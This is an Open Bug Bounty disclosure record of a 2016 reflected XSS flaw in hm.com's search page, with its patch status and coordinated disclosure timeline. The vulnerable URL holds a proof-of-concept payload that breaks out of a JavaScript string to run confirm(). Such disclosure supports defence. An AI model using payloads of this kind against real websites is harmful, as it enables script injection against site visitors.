hm.com XSS vulnerability

2016-02-25T03:46:00
ID OBB:137763
Type openbugbounty
Reporter jimcola99
Modified 2016-12-24T01:02:00

Description

Vulnerable URL:
http://www.hm.com/us/products/search?term=aids%27;confirm(%27xssposed%27);var%20f=%27

Details:

Description| Value
---|---
Patched:| Yes, on 23.12.2016
Latest check for patch:| 23.12.2016 09:46 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 425
Google PageRank:| 6
VIP website status:| Yes
Check hm.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 25 February, 2016 03:46 GMT
Generic security notifications sent to website owner| 25 February, 2016 03:48 GMT
Notification sent to subscribers (without technical details)| 25 February, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 24 March, 2016 04:11 GMT
Vulnerability patched by the website owner| 24 December, 2016 01:02 GMT